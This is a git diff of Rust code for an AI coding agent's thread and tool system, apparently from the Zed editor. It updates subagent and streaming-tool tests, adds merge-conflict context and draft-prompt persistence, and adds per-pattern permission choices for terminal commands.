model.send_last_completion_stream_event(LanguageModelCompletionEvent::Thinking { + text: "thinking more about the subagent task".into(), + signature: None, + }); + model.send_last_completion_stream_text_chunk("subagent task response 2"); + model.end_last_completion_stream(); + + cx.run_until_parked(); + + assert_eq!( + subagent_thread.read_with(cx, |thread, cx| thread.to_markdown(cx)), + indoc! 
{" + ## User + + subagent task prompt + + ## Assistant + + subagent task response 1 + + + thinking more about the subagent task + + + subagent task response 2 "} ); @@ -4292,8 +4942,9 @@ async fn test_subagent_tool_call_end_to_end(cx: &mut TestAppContext) { **Tool Call: label** Status: Completed - subagent task response + subagent task response 1 + subagent task response 2 ## Assistant @@ -4325,23 +4976,16 @@ async fn test_subagent_tool_call_cancellation_during_task_prompt(cx: &mut TestAp .await; let project = Project::test(fs.clone(), [path!("/a").as_ref()], cx).await; let thread_store = cx.new(|cx| ThreadStore::new(cx)); - let agent = NativeAgent::new( - project.clone(), - thread_store.clone(), - Templates::new(), - None, - fs.clone(), - &mut cx.to_async(), - ) - .await - .unwrap(); + let agent = cx.update(|cx| { + NativeAgent::new(thread_store.clone(), Templates::new(), None, fs.clone(), cx) + }); let connection = Rc::new(NativeAgentConnection(agent.clone())); let acp_thread = cx .update(|cx| { connection .clone() - .new_session(project.clone(), Path::new(""), cx) + .new_session(project.clone(), PathList::new(&[Path::new("")]), cx) }) .await .unwrap(); @@ -4462,23 +5106,16 @@ async fn test_subagent_tool_resume_session(cx: &mut TestAppContext) { .await; let project = Project::test(fs.clone(), [path!("/a").as_ref()], cx).await; let thread_store = cx.new(|cx| ThreadStore::new(cx)); - let agent = NativeAgent::new( - project.clone(), - thread_store.clone(), - Templates::new(), - None, - fs.clone(), - &mut cx.to_async(), - ) - .await - .unwrap(); + let agent = cx.update(|cx| { + NativeAgent::new(thread_store.clone(), Templates::new(), None, fs.clone(), cx) + }); let connection = Rc::new(NativeAgentConnection(agent.clone())); let acp_thread = cx .update(|cx| { connection .clone() - .new_session(project.clone(), Path::new(""), cx) + .new_session(project.clone(), PathList::new(&[Path::new("")]), cx) }) .await .unwrap(); @@ -4627,48 +5264,6 @@ async fn 
test_subagent_tool_resume_session(cx: &mut TestAppContext) { ); } -#[gpui::test] -async fn test_subagent_tool_is_present_when_feature_flag_enabled(cx: &mut TestAppContext) { - init_test(cx); - - cx.update(|cx| { - cx.update_flags(true, vec!["subagents".to_string()]); - }); - - let fs = FakeFs::new(cx.executor()); - fs.insert_tree(path!("/test"), json!({})).await; - let project = Project::test(fs, [path!("/test").as_ref()], cx).await; - let project_context = cx.new(|_cx| ProjectContext::default()); - let context_server_store = project.read_with(cx, |project, _| project.context_server_store()); - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(context_server_store.clone(), cx)); - let model = Arc::new(FakeLanguageModel::default()); - - let environment = Rc::new(cx.update(|cx| { - FakeThreadEnvironment::default().with_terminal(FakeTerminalHandle::new_never_exits(cx)) - })); - - let thread = cx.new(|cx| { - let mut thread = Thread::new( - project.clone(), - project_context, - context_server_registry, - Templates::new(), - Some(model), - cx, - ); - thread.add_default_tools(environment, cx); - thread - }); - - thread.read_with(cx, |thread, _| { - assert!( - thread.has_registered_tool(SpawnAgentTool::NAME), - "subagent tool should be present when feature flag is enabled" - ); - }); -} - #[gpui::test] async fn test_subagent_thread_inherits_parent_thread_properties(cx: &mut TestAppContext) { init_test(cx); @@ -4709,6 +5304,11 @@ async fn test_subagent_thread_inherits_parent_thread_properties(cx: &mut TestApp subagent_thread.parent_thread_id(), Some(parent_thread.read(cx).id().clone()) ); + + let request = subagent_thread + .build_completion_request(CompletionIntent::UserPrompt, cx) + .unwrap(); + assert_eq!(request.intent, Some(CompletionIntent::Subagent)); }); } @@ -4841,23 +5441,16 @@ async fn test_subagent_context_window_warning(cx: &mut TestAppContext) { .await; let project = Project::test(fs.clone(), [path!("/a").as_ref()], cx).await; let 
thread_store = cx.new(|cx| ThreadStore::new(cx)); - let agent = NativeAgent::new( - project.clone(), - thread_store.clone(), - Templates::new(), - None, - fs.clone(), - &mut cx.to_async(), - ) - .await - .unwrap(); + let agent = cx.update(|cx| { + NativeAgent::new(thread_store.clone(), Templates::new(), None, fs.clone(), cx) + }); let connection = Rc::new(NativeAgentConnection(agent.clone())); let acp_thread = cx .update(|cx| { connection .clone() - .new_session(project.clone(), Path::new(""), cx) + .new_session(project.clone(), PathList::new(&[Path::new("")]), cx) }) .await .unwrap(); @@ -4974,23 +5567,16 @@ async fn test_subagent_no_context_window_warning_when_already_at_warning(cx: &mu .await; let project = Project::test(fs.clone(), [path!("/a").as_ref()], cx).await; let thread_store = cx.new(|cx| ThreadStore::new(cx)); - let agent = NativeAgent::new( - project.clone(), - thread_store.clone(), - Templates::new(), - None, - fs.clone(), - &mut cx.to_async(), - ) - .await - .unwrap(); + let agent = cx.update(|cx| { + NativeAgent::new(thread_store.clone(), Templates::new(), None, fs.clone(), cx) + }); let connection = Rc::new(NativeAgentConnection(agent.clone())); let acp_thread = cx .update(|cx| { connection .clone() - .new_session(project.clone(), Path::new(""), cx) + .new_session(project.clone(), PathList::new(&[Path::new("")]), cx) }) .await .unwrap(); @@ -5155,23 +5741,16 @@ async fn test_subagent_error_propagation(cx: &mut TestAppContext) { .await; let project = Project::test(fs.clone(), [path!("/a").as_ref()], cx).await; let thread_store = cx.new(|cx| ThreadStore::new(cx)); - let agent = NativeAgent::new( - project.clone(), - thread_store.clone(), - Templates::new(), - None, - fs.clone(), - &mut cx.to_async(), - ) - .await - .unwrap(); + let agent = cx.update(|cx| { + NativeAgent::new(thread_store.clone(), Templates::new(), None, fs.clone(), cx) + }); let connection = Rc::new(NativeAgentConnection(agent.clone())); let acp_thread = cx .update(|cx| { connection 
.clone() - .new_session(project.clone(), Path::new(""), cx) + .new_session(project.clone(), PathList::new(&[Path::new("")]), cx) }) .await .unwrap(); @@ -5741,9 +6320,9 @@ async fn test_edit_file_tool_allow_rule_skips_confirmation(cx: &mut TestAppConte cx.run_until_parked(); - let event = rx.try_next(); + let event = rx.try_recv(); assert!( - !matches!(event, Ok(Some(Ok(ThreadEvent::ToolCallAuthorization(_))))), + !matches!(event, Ok(Ok(ThreadEvent::ToolCallAuthorization(_)))), "expected no authorization request for allowed .md file" ); } @@ -5885,9 +6464,9 @@ async fn test_fetch_tool_allow_rule_skips_confirmation(cx: &mut TestAppContext) cx.run_until_parked(); - let event = rx.try_next(); + let event = rx.try_recv(); assert!( - !matches!(event, Ok(Some(Ok(ThreadEvent::ToolCallAuthorization(_))))), + !matches!(event, Ok(Ok(ThreadEvent::ToolCallAuthorization(_)))), "expected no authorization request for allowed docs.rs URL" ); } @@ -5976,3 +6555,303 @@ async fn test_queued_message_ends_turn_at_boundary(cx: &mut TestAppContext) { ); }); } + +#[gpui::test] +async fn test_streaming_tool_error_breaks_stream_loop_immediately(cx: &mut TestAppContext) { + init_test(cx); + always_allow_tools(cx); + + let ThreadTest { model, thread, .. 
} = setup(cx, TestModel::Fake).await; + let fake_model = model.as_fake(); + + thread.update(cx, |thread, _cx| { + thread.add_tool(StreamingFailingEchoTool { + receive_chunks_until_failure: 1, + }); + }); + + let _events = thread + .update(cx, |thread, cx| { + thread.send( + UserMessageId::new(), + ["Use the streaming_failing_echo tool"], + cx, + ) + }) + .unwrap(); + cx.run_until_parked(); + + let tool_use = LanguageModelToolUse { + id: "call_1".into(), + name: StreamingFailingEchoTool::NAME.into(), + raw_input: "hello".into(), + input: json!({}), + is_input_complete: false, + thought_signature: None, + }; + + fake_model + .send_last_completion_stream_event(LanguageModelCompletionEvent::ToolUse(tool_use.clone())); + + cx.run_until_parked(); + + let completions = fake_model.pending_completions(); + let last_completion = completions.last().unwrap(); + + assert_eq!( + last_completion.messages[1..], + vec![ + LanguageModelRequestMessage { + role: Role::User, + content: vec!["Use the streaming_failing_echo tool".into()], + cache: false, + reasoning_details: None, + }, + LanguageModelRequestMessage { + role: Role::Assistant, + content: vec![language_model::MessageContent::ToolUse(tool_use.clone())], + cache: false, + reasoning_details: None, + }, + LanguageModelRequestMessage { + role: Role::User, + content: vec![language_model::MessageContent::ToolResult( + LanguageModelToolResult { + tool_use_id: tool_use.id.clone(), + tool_name: tool_use.name, + is_error: true, + content: "failed".into(), + output: Some("failed".into()), + } + )], + cache: true, + reasoning_details: None, + }, + ] + ); +} + +#[gpui::test] +async fn test_streaming_tool_error_waits_for_prior_tools_to_complete(cx: &mut TestAppContext) { + init_test(cx); + always_allow_tools(cx); + + let ThreadTest { model, thread, .. 
} = setup(cx, TestModel::Fake).await; + let fake_model = model.as_fake(); + + let (complete_streaming_echo_tool_call_tx, complete_streaming_echo_tool_call_rx) = + oneshot::channel(); + + thread.update(cx, |thread, _cx| { + thread.add_tool( + StreamingEchoTool::new().with_wait_until_complete(complete_streaming_echo_tool_call_rx), + ); + thread.add_tool(StreamingFailingEchoTool { + receive_chunks_until_failure: 1, + }); + }); + + let _events = thread + .update(cx, |thread, cx| { + thread.send( + UserMessageId::new(), + ["Use the streaming_echo tool and the streaming_failing_echo tool"], + cx, + ) + }) + .unwrap(); + cx.run_until_parked(); + + fake_model.send_last_completion_stream_event(LanguageModelCompletionEvent::ToolUse( + LanguageModelToolUse { + id: "call_1".into(), + name: StreamingEchoTool::NAME.into(), + raw_input: "hello".into(), + input: json!({ "text": "hello" }), + is_input_complete: false, + thought_signature: None, + }, + )); + let first_tool_use = LanguageModelToolUse { + id: "call_1".into(), + name: StreamingEchoTool::NAME.into(), + raw_input: "hello world".into(), + input: json!({ "text": "hello world" }), + is_input_complete: true, + thought_signature: None, + }; + fake_model.send_last_completion_stream_event(LanguageModelCompletionEvent::ToolUse( + first_tool_use.clone(), + )); + let second_tool_use = LanguageModelToolUse { + name: StreamingFailingEchoTool::NAME.into(), + raw_input: "hello".into(), + input: json!({ "text": "hello" }), + is_input_complete: false, + thought_signature: None, + id: "call_2".into(), + }; + fake_model.send_last_completion_stream_event(LanguageModelCompletionEvent::ToolUse( + second_tool_use.clone(), + )); + + cx.run_until_parked(); + + complete_streaming_echo_tool_call_tx.send(()).unwrap(); + + cx.run_until_parked(); + + let completions = fake_model.pending_completions(); + let last_completion = completions.last().unwrap(); + + assert_eq!( + last_completion.messages[1..], + vec![ + LanguageModelRequestMessage { + role: 
Role::User, + content: vec![ + "Use the streaming_echo tool and the streaming_failing_echo tool".into() + ], + cache: false, + reasoning_details: None, + }, + LanguageModelRequestMessage { + role: Role::Assistant, + content: vec![ + language_model::MessageContent::ToolUse(first_tool_use.clone()), + language_model::MessageContent::ToolUse(second_tool_use.clone()) + ], + cache: false, + reasoning_details: None, + }, + LanguageModelRequestMessage { + role: Role::User, + content: vec![ + language_model::MessageContent::ToolResult(LanguageModelToolResult { + tool_use_id: second_tool_use.id.clone(), + tool_name: second_tool_use.name, + is_error: true, + content: "failed".into(), + output: Some("failed".into()), + }), + language_model::MessageContent::ToolResult(LanguageModelToolResult { + tool_use_id: first_tool_use.id.clone(), + tool_name: first_tool_use.name, + is_error: false, + content: "hello world".into(), + output: Some("hello world".into()), + }), + ], + cache: true, + reasoning_details: None, + }, + ] + ); +} + +#[gpui::test] +async fn test_mid_turn_model_and_settings_refresh(cx: &mut TestAppContext) { + let ThreadTest { + model, thread, fs, .. + } = setup(cx, TestModel::Fake).await; + let fake_model_a = model.as_fake(); + + thread.update(cx, |thread, _cx| { + thread.add_tool(EchoTool); + thread.add_tool(DelayTool); + }); + + // Set up two profiles: profile-a has both tools, profile-b has only DelayTool. 
+ fs.insert_file( + paths::settings_file(), + json!({ + "agent": { + "profiles": { + "profile-a": { + "name": "Profile A", + "tools": { + EchoTool::NAME: true, + DelayTool::NAME: true, + } + }, + "profile-b": { + "name": "Profile B", + "tools": { + DelayTool::NAME: true, + } + } + } + } + }) + .to_string() + .into_bytes(), + ) + .await; + cx.run_until_parked(); + + thread.update(cx, |thread, cx| { + thread.set_profile(AgentProfileId("profile-a".into()), cx); + thread.set_thinking_enabled(false, cx); + }); + + // Send a message — first iteration starts with model A, profile-a, thinking off. + thread + .update(cx, |thread, cx| { + thread.send(UserMessageId::new(), ["test mid-turn refresh"], cx) + }) + .unwrap(); + cx.run_until_parked(); + + // Verify first request has both tools and thinking disabled. + let completions = fake_model_a.pending_completions(); + assert_eq!(completions.len(), 1); + let first_tools = tool_names_for_completion(&completions[0]); + assert_eq!(first_tools, vec![DelayTool::NAME, EchoTool::NAME]); + assert!(!completions[0].thinking_allowed); + + // Model A responds with an echo tool call. + fake_model_a.send_last_completion_stream_event(LanguageModelCompletionEvent::ToolUse( + LanguageModelToolUse { + id: "tool_1".into(), + name: "echo".into(), + raw_input: r#"{"text":"hello"}"#.into(), + input: json!({"text": "hello"}), + is_input_complete: true, + thought_signature: None, + }, + )); + fake_model_a.end_last_completion_stream(); + + // Before the next iteration runs, switch to profile-b (only DelayTool), + // swap in a new model, and enable thinking. 
+ let fake_model_b = Arc::new(FakeLanguageModel::with_id_and_thinking( + "test-provider", + "model-b", + "Model B", + true, + )); + thread.update(cx, |thread, cx| { + thread.set_profile(AgentProfileId("profile-b".into()), cx); + thread.set_model(fake_model_b.clone() as Arc, cx); + thread.set_thinking_enabled(true, cx); + }); + + // Run until parked — processes the echo tool call, loops back, picks up + // the new model/profile/thinking, and makes a second request to model B. + cx.run_until_parked(); + + // The second request should have gone to model B. + let model_b_completions = fake_model_b.pending_completions(); + assert_eq!( + model_b_completions.len(), + 1, + "second request should go to model B" + ); + + // Profile-b only has DelayTool, so echo should be gone. + let second_tools = tool_names_for_completion(&model_b_completions[0]); + assert_eq!(second_tools, vec![DelayTool::NAME]); + + // Thinking should now be enabled. + assert!(model_b_completions[0].thinking_allowed); +} diff --git a/crates/agent/src/tests/test_tools.rs b/crates/agent/src/tests/test_tools.rs index e0794ee322cdf2c77c37d1d22f30ec77c5642d24..4744204fae1213d49af92339b8847e9d1f470125 100644 --- a/crates/agent/src/tests/test_tools.rs +++ b/crates/agent/src/tests/test_tools.rs @@ -2,9 +2,191 @@ use super::*; use agent_settings::AgentSettings; use gpui::{App, SharedString, Task}; use std::future; +use std::sync::Mutex; use std::sync::atomic::{AtomicBool, Ordering}; use std::time::Duration; +/// A streaming tool that echoes its input, used to test streaming tool +/// lifecycle (e.g. partial delivery and cleanup when the LLM stream ends +/// before `is_input_complete`). +#[derive(JsonSchema, Serialize, Deserialize)] +pub struct StreamingEchoToolInput { + /// The text to echo. 
+ pub text: String, +} + +pub struct StreamingEchoTool { + wait_until_complete_rx: Mutex>>, +} + +impl StreamingEchoTool { + pub fn new() -> Self { + Self { + wait_until_complete_rx: Mutex::new(None), + } + } + + pub fn with_wait_until_complete(mut self, receiver: oneshot::Receiver<()>) -> Self { + self.wait_until_complete_rx = Mutex::new(Some(receiver)); + self + } +} + +impl AgentTool for StreamingEchoTool { + type Input = StreamingEchoToolInput; + type Output = String; + + const NAME: &'static str = "streaming_echo"; + + fn supports_input_streaming() -> bool { + true + } + + fn kind() -> acp::ToolKind { + acp::ToolKind::Other + } + + fn initial_title( + &self, + _input: Result, + _cx: &mut App, + ) -> SharedString { + "Streaming Echo".into() + } + + fn run( + self: Arc, + input: ToolInput, + _event_stream: ToolCallEventStream, + cx: &mut App, + ) -> Task> { + let wait_until_complete_rx = self.wait_until_complete_rx.lock().unwrap().take(); + cx.spawn(async move |_cx| { + let input = input + .recv() + .await + .map_err(|e| format!("Failed to receive tool input: {e}"))?; + if let Some(rx) = wait_until_complete_rx { + rx.await.ok(); + } + Ok(input.text) + }) + } +} + +#[derive(JsonSchema, Serialize, Deserialize)] +pub struct StreamingJsonErrorContextToolInput { + /// The text to echo. 
+ pub text: String, +} + +pub struct StreamingJsonErrorContextTool; + +impl AgentTool for StreamingJsonErrorContextTool { + type Input = StreamingJsonErrorContextToolInput; + type Output = String; + + const NAME: &'static str = "streaming_json_error_context"; + + fn supports_input_streaming() -> bool { + true + } + + fn kind() -> acp::ToolKind { + acp::ToolKind::Other + } + + fn initial_title( + &self, + _input: Result, + _cx: &mut App, + ) -> SharedString { + "Streaming JSON Error Context".into() + } + + fn run( + self: Arc, + mut input: ToolInput, + _event_stream: ToolCallEventStream, + cx: &mut App, + ) -> Task> { + cx.spawn(async move |_cx| { + let mut last_partial_text = None; + + loop { + match input.next().await { + Ok(ToolInputPayload::Partial(partial)) => { + if let Some(text) = partial.get("text").and_then(|value| value.as_str()) { + last_partial_text = Some(text.to_string()); + } + } + Ok(ToolInputPayload::Full(input)) => return Ok(input.text), + Ok(ToolInputPayload::InvalidJson { error_message }) => { + let partial_text = last_partial_text.unwrap_or_default(); + return Err(format!( + "Saw partial text '{partial_text}' before invalid JSON: {error_message}" + )); + } + Err(error) => { + return Err(format!("Failed to receive tool input: {error}")); + } + } + } + }) + } +} + +/// A streaming tool that echoes its input, used to test streaming tool +/// lifecycle (e.g. partial delivery and cleanup when the LLM stream ends +/// before `is_input_complete`). +#[derive(JsonSchema, Serialize, Deserialize)] +pub struct StreamingFailingEchoToolInput { + /// The text to echo. 
+ pub text: String, +} + +pub struct StreamingFailingEchoTool { + pub receive_chunks_until_failure: usize, +} + +impl AgentTool for StreamingFailingEchoTool { + type Input = StreamingFailingEchoToolInput; + + type Output = String; + + const NAME: &'static str = "streaming_failing_echo"; + + fn kind() -> acp::ToolKind { + acp::ToolKind::Other + } + + fn supports_input_streaming() -> bool { + true + } + + fn initial_title( + &self, + _input: Result, + _cx: &mut App, + ) -> SharedString { + "echo".into() + } + + fn run( + self: Arc, + mut input: ToolInput, + _event_stream: ToolCallEventStream, + cx: &mut App, + ) -> Task> { + cx.spawn(async move |_cx| { + for _ in 0..self.receive_chunks_until_failure { + let _ = input.next().await; + } + Err("failed".into()) + }) + } +} + /// A tool that echoes its input #[derive(JsonSchema, Serialize, Deserialize)] pub struct EchoToolInput { diff --git a/crates/agent/src/thread.rs b/crates/agent/src/thread.rs index 63e180e7a9686991ba67e813c51b65bcc5a8bedf..ea342e8db4e4d97d5eccc849121cd0fd2e403017 100644 --- a/crates/agent/src/thread.rs +++ b/crates/agent/src/thread.rs @@ -3,45 +3,43 @@ use crate::{ DeletePathTool, DiagnosticsTool, EditFileTool, FetchTool, FindPathTool, GrepTool, ListDirectoryTool, MovePathTool, NowTool, OpenTool, ProjectSnapshot, ReadFileTool, RestoreFileFromDiskTool, SaveFileTool, SpawnAgentTool, StreamingEditFileTool, - SystemPromptTemplate, Template, Templates, TerminalTool, ToolPermissionDecision, WebSearchTool, - decide_permission_from_settings, + SystemPromptTemplate, Template, Templates, TerminalTool, ToolPermissionDecision, + UpdatePlanTool, WebSearchTool, decide_permission_from_settings, }; use acp_thread::{MentionUri, UserMessageId}; use action_log::ActionLog; use feature_flags::{ - FeatureFlagAppExt as _, StreamingEditFileToolFeatureFlag, SubagentsFeatureFlag, + FeatureFlagAppExt as _, StreamingEditFileToolFeatureFlag, UpdatePlanToolFeatureFlag, }; use agent_client_protocol as acp; use agent_settings::{ - 
AgentProfileId, AgentProfileSettings, AgentSettings, SUMMARIZE_THREAD_DETAILED_PROMPT, - SUMMARIZE_THREAD_PROMPT, + AgentProfileId, AgentSettings, SUMMARIZE_THREAD_DETAILED_PROMPT, SUMMARIZE_THREAD_PROMPT, }; use anyhow::{Context as _, Result, anyhow}; use chrono::{DateTime, Utc}; use client::UserStore; use cloud_api_types::Plan; -use cloud_llm_client::CompletionIntent; use collections::{HashMap, HashSet, IndexMap}; use fs::Fs; -use futures::stream; use futures::{ FutureExt, channel::{mpsc, oneshot}, future::Shared, stream::FuturesUnordered, }; +use futures::{StreamExt, stream}; use gpui::{ App, AppContext, AsyncApp, Context, Entity, EventEmitter, SharedString, Task, WeakEntity, }; use heck::ToSnakeCase as _; use language_model::{ - LanguageModel, LanguageModelCompletionError, LanguageModelCompletionEvent, LanguageModelId, - LanguageModelImage, LanguageModelProviderId, LanguageModelRegistry, LanguageModelRequest, - LanguageModelRequestMessage, LanguageModelRequestTool, LanguageModelToolResult, - LanguageModelToolResultContent, LanguageModelToolSchemaFormat, LanguageModelToolUse, - LanguageModelToolUseId, Role, SelectedModel, Speed, StopReason, TokenUsage, - ZED_CLOUD_PROVIDER_ID, + CompletionIntent, LanguageModel, LanguageModelCompletionError, LanguageModelCompletionEvent, + LanguageModelId, LanguageModelImage, LanguageModelProviderId, LanguageModelRegistry, + LanguageModelRequest, LanguageModelRequestMessage, LanguageModelRequestTool, + LanguageModelToolResult, LanguageModelToolResultContent, LanguageModelToolSchemaFormat, + LanguageModelToolUse, LanguageModelToolUseId, Role, SelectedModel, Speed, StopReason, + TokenUsage, ZED_CLOUD_PROVIDER_ID, }; use project::Project; use prompt_store::ProjectContext; @@ -49,7 +47,6 @@ use schemars::{JsonSchema, Schema}; use serde::de::DeserializeOwned; use serde::{Deserialize, Serialize}; use settings::{LanguageModelSelection, Settings, ToolPermissionMode, update_settings_file}; -use smol::stream::StreamExt; use std::{ 
collections::BTreeMap, marker::PhantomData, @@ -221,6 +218,7 @@ impl UserMessage { "\nThe user has specified the following rules that should be applied:\n"; const OPEN_DIAGNOSTICS_TAG: &str = ""; const OPEN_DIFFS_TAG: &str = ""; + const MERGE_CONFLICT_TAG: &str = ""; let mut file_context = OPEN_FILES_TAG.to_string(); let mut directory_context = OPEN_DIRECTORIES_TAG.to_string(); @@ -231,6 +229,7 @@ impl UserMessage { let mut rules_context = OPEN_RULES_TAG.to_string(); let mut diagnostics_context = OPEN_DIAGNOSTICS_TAG.to_string(); let mut diffs_context = OPEN_DIFFS_TAG.to_string(); + let mut merge_conflict_context = MERGE_CONFLICT_TAG.to_string(); for chunk in &self.content { let chunk = match chunk { @@ -253,7 +252,7 @@ impl UserMessage { ) .ok(); } - MentionUri::PastedImage => { + MentionUri::PastedImage { .. } => { debug_panic!("pasted image URI should not be used in mention content") } MentionUri::Directory { .. } => { @@ -295,9 +294,6 @@ impl UserMessage { MentionUri::Thread { .. } => { write!(&mut thread_context, "\n{}\n", content).ok(); } - MentionUri::TextThread { .. } => { - write!(&mut thread_context, "\n{}\n", content).ok(); - } MentionUri::Rule { .. 
} => { write!( &mut rules_context, @@ -338,6 +334,18 @@ impl UserMessage { ) .ok(); } + MentionUri::MergeConflict { file_path } => { + write!( + &mut merge_conflict_context, + "\nMerge conflict in {}:\n{}", + file_path, + MarkdownCodeBlock { + tag: "diff", + text: content + } + ) + .ok(); + } } language_model::MessageContent::Text(uri.as_link().to_string()) @@ -412,6 +420,13 @@ impl UserMessage { .push(language_model::MessageContent::Text(diagnostics_context)); } + if merge_conflict_context.len() > MERGE_CONFLICT_TAG.len() { + merge_conflict_context.push_str("\n"); + message + .content + .push(language_model::MessageContent::Text(merge_conflict_context)); + } + if message.content.len() > len_before_context { message.content.insert( len_before_context, @@ -605,7 +620,12 @@ pub trait TerminalHandle { } pub trait SubagentHandle { + /// The session ID of this subagent thread fn id(&self) -> acp::SessionId; + /// The current number of entries in the thread. + /// Useful for knowing where the next turn will begin + fn num_entries(&self, cx: &App) -> usize; + /// Runs a turn for a given message and returns both the response and the index of that output message. fn send(&self, message: String, cx: &AsyncApp) -> Task>; } @@ -638,6 +658,7 @@ pub enum ThreadEvent { AgentThinking(String), ToolCall(acp::ToolCall), ToolCallUpdate(acp_thread::ToolCallUpdate), + Plan(acp::Plan), ToolCallAuthorization(ToolCallAuthorization), SubagentSpawned(acp::SessionId), Retry(acp_thread::RetryStatus), @@ -735,6 +756,48 @@ impl ToolPermissionContext { true }; + // For terminal commands with multiple pipeline commands, use DropdownWithPatterns + // to let users individually select which command patterns to always allow. 
+ if tool_name == TerminalTool::NAME && shell_supports_always_allow { + if let Some(input) = input_values.first() { + let all_patterns = extract_all_terminal_patterns(input); + if all_patterns.len() > 1 { + let mut choices = Vec::new(); + choices.push(acp_thread::PermissionOptionChoice { + allow: acp::PermissionOption::new( + acp::PermissionOptionId::new(format!("always_allow:{}", tool_name)), + format!("Always for {}", tool_name.replace('_', " ")), + acp::PermissionOptionKind::AllowAlways, + ), + deny: acp::PermissionOption::new( + acp::PermissionOptionId::new(format!("always_deny:{}", tool_name)), + format!("Always for {}", tool_name.replace('_', " ")), + acp::PermissionOptionKind::RejectAlways, + ), + sub_patterns: vec![], + }); + choices.push(acp_thread::PermissionOptionChoice { + allow: acp::PermissionOption::new( + acp::PermissionOptionId::new("allow"), + "Only this time", + acp::PermissionOptionKind::AllowOnce, + ), + deny: acp::PermissionOption::new( + acp::PermissionOptionId::new("deny"), + "Only this time", + acp::PermissionOptionKind::RejectOnce, + ), + sub_patterns: vec![], + }); + return acp_thread::PermissionOptions::DropdownWithPatterns { + choices, + patterns: all_patterns, + tool_name: tool_name.clone(), + }; + } + } + } + let extract_for_value = |value: &str| -> (Option, Option) { if tool_name == TerminalTool::NAME { ( @@ -783,20 +846,22 @@ impl ToolPermissionContext { let mut choices = Vec::new(); - let mut push_choice = |label: String, allow_id, deny_id, allow_kind, deny_kind| { - choices.push(acp_thread::PermissionOptionChoice { - allow: acp::PermissionOption::new( - acp::PermissionOptionId::new(allow_id), - label.clone(), - allow_kind, - ), - deny: acp::PermissionOption::new( - acp::PermissionOptionId::new(deny_id), - label, - deny_kind, - ), - }); - }; + let mut push_choice = + |label: String, allow_id, deny_id, allow_kind, deny_kind, sub_patterns: Vec| { + choices.push(acp_thread::PermissionOptionChoice { + allow: acp::PermissionOption::new( 
+ acp::PermissionOptionId::new(allow_id), + label.clone(), + allow_kind, + ), + deny: acp::PermissionOption::new( + acp::PermissionOptionId::new(deny_id), + label, + deny_kind, + ), + sub_patterns, + }); + }; if shell_supports_always_allow { push_choice( @@ -805,6 +870,7 @@ impl ToolPermissionContext { format!("always_deny:{}", tool_name), acp::PermissionOptionKind::AllowAlways, acp::PermissionOptionKind::RejectAlways, + vec![], ); if let (Some(pattern), Some(display)) = (pattern, pattern_display) { @@ -815,10 +881,11 @@ impl ToolPermissionContext { }; push_choice( button_text, - format!("always_allow_pattern:{}\n{}", tool_name, pattern), - format!("always_deny_pattern:{}\n{}", tool_name, pattern), + format!("always_allow:{}", tool_name), + format!("always_deny:{}", tool_name), acp::PermissionOptionKind::AllowAlways, acp::PermissionOptionKind::RejectAlways, + vec![pattern], ); } } @@ -829,6 +896,7 @@ impl ToolPermissionContext { "deny".to_string(), acp::PermissionOptionKind::AllowOnce, acp::PermissionOptionKind::RejectOnce, + vec![], ); acp_thread::PermissionOptions::Dropdown(choices) @@ -839,7 +907,7 @@ impl ToolPermissionContext { pub struct ToolCallAuthorization { pub tool_call: acp::ToolCallUpdate, pub options: acp_thread::PermissionOptions, - pub response: oneshot::Sender, + pub response: oneshot::Sender, pub context: Option, } @@ -890,12 +958,13 @@ pub struct Thread { pub(crate) prompt_capabilities_rx: watch::Receiver, pub(crate) project: Entity, pub(crate) action_log: Entity, - /// Tracks the last time files were read by the agent, to detect external modifications - pub(crate) file_read_times: HashMap, /// True if this thread was imported from a shared thread and can be synced. imported: bool, /// If this is a subagent thread, contains context about the parent subagent_context: Option, + /// The user's unsent prompt text, persisted so it can be restored when reloading the thread. 
+ draft_prompt: Option>, + ui_scroll_position: Option, /// Weak references to running subagent threads for cancellation propagation running_subagents: Vec>, } @@ -914,12 +983,16 @@ impl Thread { let context_server_registry = parent_thread.read(cx).context_server_registry.clone(); let templates = parent_thread.read(cx).templates.clone(); let model = parent_thread.read(cx).model().cloned(); - let mut thread = Self::new( + let parent_action_log = parent_thread.read(cx).action_log().clone(); + let action_log = + cx.new(|_cx| ActionLog::new(project.clone()).with_linked_action_log(parent_action_log)); + let mut thread = Self::new_internal( project, project_context, context_server_registry, templates, model, + action_log, cx, ); thread.subagent_context = Some(SubagentContext { @@ -936,6 +1009,26 @@ impl Thread { templates: Arc, model: Option>, cx: &mut Context, + ) -> Self { + Self::new_internal( + project.clone(), + project_context, + context_server_registry, + templates, + model, + cx.new(|_cx| ActionLog::new(project)), + cx, + ) + } + + fn new_internal( + project: Entity, + project_context: Entity, + context_server_registry: Entity, + templates: Arc, + model: Option>, + action_log: Entity, + cx: &mut Context, ) -> Self { let settings = AgentSettings::get_global(cx); let profile_id = settings.default_profile.clone(); @@ -947,7 +1040,6 @@ impl Thread { .default_model .as_ref() .and_then(|model| model.effort.clone()); - let action_log = cx.new(|_cx| ActionLog::new(project.clone())); let (prompt_capabilities_tx, prompt_capabilities_rx) = watch::channel(Self::prompt_capabilities(model.as_deref())); Self { @@ -985,9 +1077,10 @@ impl Thread { prompt_capabilities_rx, project, action_log, - file_read_times: HashMap::default(), imported: false, subagent_context: None, + draft_prompt: None, + ui_scroll_position: None, running_subagents: Vec::new(), } } @@ -1200,9 +1293,13 @@ impl Thread { updated_at: db_thread.updated_at, prompt_capabilities_tx, prompt_capabilities_rx, - 
file_read_times: HashMap::default(), imported: db_thread.imported, subagent_context: db_thread.subagent_context, + draft_prompt: db_thread.draft_prompt, + ui_scroll_position: db_thread.ui_scroll_position.map(|sp| gpui::ListOffset { + item_ix: sp.item_ix, + offset_in_item: gpui::px(sp.offset_in_item), + }), running_subagents: Vec::new(), } } @@ -1210,7 +1307,7 @@ impl Thread { pub fn to_db(&self, cx: &App) -> Task { let initial_project_snapshot = self.initial_project_snapshot.clone(); let mut thread = DbThread { - title: self.title(), + title: self.title().unwrap_or_default(), messages: self.messages.clone(), updated_at: self.updated_at, detailed_summary: self.summary.clone(), @@ -1227,6 +1324,13 @@ impl Thread { speed: self.speed, thinking_enabled: self.thinking_enabled, thinking_effort: self.thinking_effort.clone(), + draft_prompt: self.draft_prompt.clone(), + ui_scroll_position: self.ui_scroll_position.map(|lo| { + crate::db::SerializedScrollPosition { + item_ix: lo.item_ix, + offset_in_item: lo.offset_in_item.as_f32(), + } + }), }; cx.background_spawn(async move { @@ -1268,19 +1372,42 @@ impl Thread { 